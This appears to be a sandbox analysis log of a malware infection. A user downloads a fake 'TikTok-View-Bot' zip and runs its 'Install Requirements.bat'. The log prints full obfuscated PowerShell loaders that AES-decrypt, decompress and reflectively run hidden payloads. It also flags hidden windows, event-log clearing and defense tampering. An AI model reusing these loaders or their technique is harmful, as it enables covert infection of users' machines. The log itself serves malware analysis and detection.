$pgsFe).count -gt 1) {exit};$svygs = 
[Microsoft.Win32.Registry]::('@L@o@c@a@l@M@a@c@h@i@n@e@'.Replace('@', '')).('@O@p@e@n@S@u@b@k@e@y@'.Replace('@', ''))($eozqm).('@G@e@t@V@a@l@u@e@'.Replace('@', ''))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::('@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@'.Replace('@', ''))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); "4⤵PID:456
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass4⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5872 -
C:\Windows\$sxr-cmd.exe"C:\Windows\$sxr-cmd.exe" /C echo [System.Diagnostics.Process]::GetProcessById(5872).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $Vjthl=$hORPG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace("@", ""), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = 
sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue $pgsFe).count -gt 1) {exit};$svygs = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($eozqm).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); | C:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass > nul5⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
PID:5772 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo [System.Diagnostics.Process]::GetProcessById(5872).WaitForExit();[System.Threading.Thread]::Sleep(5000); function qMtRC($gWzGN){ $GdrFH=[System.Security.Cryptography.Aes]::Create(); $GdrFH.Mode=[System.Security.Cryptography.CipherMode]::CBC; $GdrFH.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $GdrFH.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('ebO+Aryuk6gf0BxazN+wB5J+avy0lg7JHhkLWe8y2yI='); $GdrFH.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('xVLhhOD/brto5F3wxDlgbg=='); $hORPG=$GdrFH.("@C@r@e@a@t@e@D@e@c@r@y@p@t@o@r@".Replace("@", ""))(); $Vjthl=$hORPG.("@T@r@a@n@s@f@o@r@m@F@i@n@a@l@B@l@o@c@k@".Replace("@", ""))($gWzGN, 0, $gWzGN.Length); $hORPG.Dispose(); $GdrFH.Dispose(); $Vjthl;}function OZFAi($gWzGN){ $FFyoT=New-Object System.IO.MemoryStream(,$gWzGN); $mVCUn=New-Object System.IO.MemoryStream; Invoke-Expression '$RAoQb @=@ @N@e@w@-@O@b@j@e@c@t@ @S@y@s@t@e@m@.@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@G@Z@i@p@S@t@r@e@a@m@(@$FFyoT,@ @[@I@O@.@C@o@m@p@r@e@s@s@i@o@n@.@C@o@m@p@r@e@s@s@i@o@n@M@o@d@e@]@:@:@D@e@c@o@m@p@r@e@s@s@)@;@'.Replace('@', ''); $RAoQb.CopyTo($mVCUn); $RAoQb.Dispose(); $FFyoT.Dispose(); $mVCUn.Dispose(); $mVCUn.ToArray();}function sohYQ($gWzGN){ $Vjthl = [System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($gWzGN); $Vjthl = qMtRC($Vjthl); $Vjthl = [System.Text.Encoding]::("@U@T@F@8@".Replace("@", "")).("@G@e@t@S@t@r@i@n@g@".Replace("@", ""))($Vjthl); return $Vjthl;}function execute_function($gWzGN,$ZjYBc){ $oHnMF = @( '$TTMkY = [System.@R@e@f@l@e@c@t@i@o@[email protected]]::Load([byte[]]$gWzGN);'.Replace("@", ""), '$HKdVE = $TTMkY.EntryPoint;', '$HKdVE.Invoke($null, $ZjYBc);' ); foreach ($LLPuJ in $oHnMF) { Invoke-Expression $LLPuJ };}$eozqm = sohYQ('ZW7xhgvLHXMUe5bc4eXVuA==');$Mfplr = sohYQ('PC/5zwoH62em+JweMmmnRF6FFlFwMgxIEjUMY2OAf+E=');$CovkQ = sohYQ('61e5zkqK6YHhnF314dvBlQ==');$pgsFe = 
sohYQ('VzpK5zKQOkmaog2Fh3I7Hw==');if (@(get-process -ea silentlycontinue $pgsFe).count -gt 1) {exit};$svygs = [Microsoft.Win32.Registry]::("@L@o@c@a@l@M@a@c@h@i@n@e@".Replace("@", "")).("@O@p@e@n@S@u@b@k@e@y@".Replace("@", ""))($eozqm).("@G@e@t@V@a@l@u@e@".Replace("@", ""))($Mfplr);$CCXtH=OZFAi (qMtRC ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($svygs)));execute_function $CCXtH (,[string[]] ($CovkQ)); "6⤵PID:3612
-
-
C:\Windows\$sxr-powershell.exeC:\Windows\$sxr-powershell.exe -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass6⤵
- Executes dropped EXE
- Hide Artifacts: Hidden Window
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5764
-
-
-
-
-
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵PID:1120
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵PID:1132
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog1⤵
- Indicator Removal: Clear Windows Event Logs
PID:1140
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵PID:1280
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc1⤵PID:1296
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp1⤵PID:1364
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc1⤵PID:1388
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager1⤵PID:1424
-
C:\Windows\system32\sihost.exesihost.exe2⤵PID:2604
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem1⤵PID:1580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s Themes1⤵PID:1592
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc1⤵PID:1656
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s SENS1⤵PID:1720
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s netprofm1⤵PID:1756
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder1⤵PID:1816
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:1924
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt1⤵PID:1968
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache1⤵PID:1980
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository1⤵PID:1512
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p1⤵PID:2064
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection1⤵PID:2132
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:2264
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc1⤵PID:2328
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation1⤵PID:2344
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent1⤵PID:2532
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT1⤵PID:2540
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc1⤵PID:2632
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc1⤵PID:2740
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker1⤵PID:2784
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer1⤵PID:2812
-
C:\Windows\sysmon.exeC:\Windows\sysmon.exe1⤵PID:2824
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks1⤵PID:2856
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService1⤵PID:2868
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:2792
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of UnmapMainImage
PID:3372 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/topics/tiktok-bot-views2⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff8ef2a46f8,0x7ff8ef2a4708,0x7ff8ef2a47183⤵PID:4692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2184 /prefetch:23⤵PID:4388
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 /prefetch:33⤵
- Suspicious behavior: EnumeratesProcesses
PID:224
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2596 /prefetch:83⤵PID:4960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:13⤵PID:5048
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3276 /prefetch:13⤵PID:3652
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:83⤵PID:2844
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5232 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3668
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5524 /prefetch:83⤵PID:4592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5604 /prefetch:13⤵PID:2272
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:4320
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6076 /prefetch:13⤵PID:2432
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:13⤵PID:3920
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:13⤵PID:4356
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5752 /prefetch:13⤵PID:428
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3404 /prefetch:13⤵PID:5316
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6240 /prefetch:13⤵PID:6136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2964 /prefetch:83⤵
- Suspicious behavior: EnumeratesProcesses
PID:3908
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6552 /prefetch:13⤵PID:1528
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6324 /prefetch:13⤵PID:5580
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6568 /prefetch:83⤵PID:6120
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6000 /prefetch:13⤵PID:6068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5388 /prefetch:83⤵PID:4588
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1280 /prefetch:13⤵PID:5304
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6388 /prefetch:83⤵PID:2476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5272 /prefetch:83⤵PID:4532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2152,1132705861036518492,5191356126266004648,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6824 /prefetch:23⤵PID:3096
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_TikTok-View-Bot-main.zip\TikTok-View-Bot-main\Install Requirements.bat" "2⤵PID:5904
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function ztLBP($RhrUG){ $CeYrU=[System.Security.Cryptography.Aes]::Create(); $CeYrU.Mode=[System.Security.Cryptography.CipherMode]::CBC; $CeYrU.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $CeYrU.Key=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('mmxu0Z74R3nlPjrZ9Bxz2hZ0VrTTk6gCCKTL3SDWqSU='); $CeYrU.IV=[System.Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))('K9VTo12byOW44PEI4Kd6uw=='); $Insag=$CeYrU.CreateDecryptor(); $return_var=$Insag.TransformFinalBlock($RhrUG, 0, $RhrUG.Length); $Insag.Dispose(); $CeYrU.Dispose(); $return_var;}function zuCVk($RhrUG){ $sPoPp=New-Object System.IO.MemoryStream(,$RhrUG); $IqIPQ=New-Object System.IO.MemoryStream; Invoke-Expression '$TcJvv #=# #N#e#w#-#O#b#j#e#c#t# #S#y#s#t#e#m#.#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#G#Z#i#p#S#t#r#e#a#m#(#$sPoPp,# #[#I#O#.#C#o#m#p#r#e#s#s#i#o#n#.#C#o#m#p#r#e#s#s#i#o#n#M#o#d#e#]#:#:#D#e#c#o#m#p#r#e#s#s#)#;#'.Replace('#', ''); $TcJvv.CopyTo($IqIPQ); $TcJvv.Dispose(); $sPoPp.Dispose(); $IqIPQ.Dispose(); $IqIPQ.ToArray();}function WlTcb($RhrUG,$WHsxi){ $zAMmO = @( '$KMbyY = [System.#R#e#f#l#e#c#t#i#o#n#.Assembly]::("@L@o@a@d@".Replace("@", ""))([byte[]]$RhrUG);'.Replace("#", ""), '$fuwPn = $KMbyY.EntryPoint;', '$fuwPn.Invoke($null, $WHsxi);' ); foreach ($hVPxP in $zAMmO) { Invoke-Expression $hVPxP };}$VfJPp=[System.IO.File]::("@R@e@a@d@A@l@l@T@e@x@t@".Replace("@", ""))('C:\Users\Admin\AppData\Local\Temp\Temp1_TikTok-View-Bot-main.zip\TikTok-View-Bot-main\Install Requirements.bat').Split([Environment]::NewLine);foreach ($bPNLO in $VfJPp) { if ($bPNLO.StartsWith('SIROXEN')) { $jZsEB=$bPNLO.Substring(7); break; }}$AYNiU=zuCVk (ztLBP ([Convert]::("@F@r@o@m@B@a@s@e@6@4@S@t@r@i@n@g@".Replace("@", ""))($jZsEB)));WlTcb $AYNiU (,[string[]] ('C:\Users\Admin\AppData\Local\Temp\Temp1_TikTok-View-Bot-main.zip\TikTok-View-Bot-main\Install Requirements.bat')); "3⤵PID:6024
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ep bypass -noprofile -windowstyle hidden3⤵
- Command and Scripting Interpreter: PowerShell
- Impair Defenses: Safe Mode Boot
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:6032 -
C:\Windows\system32\wermgr.exe"C:\Windows\system32\wermgr.exe" "-outproc" "0" "6032" "2476" "2400" "2480" "0" "0" "2484" "0" "0" "0" "0" "0"4⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:3696
-
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵PID:3384
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3564
-
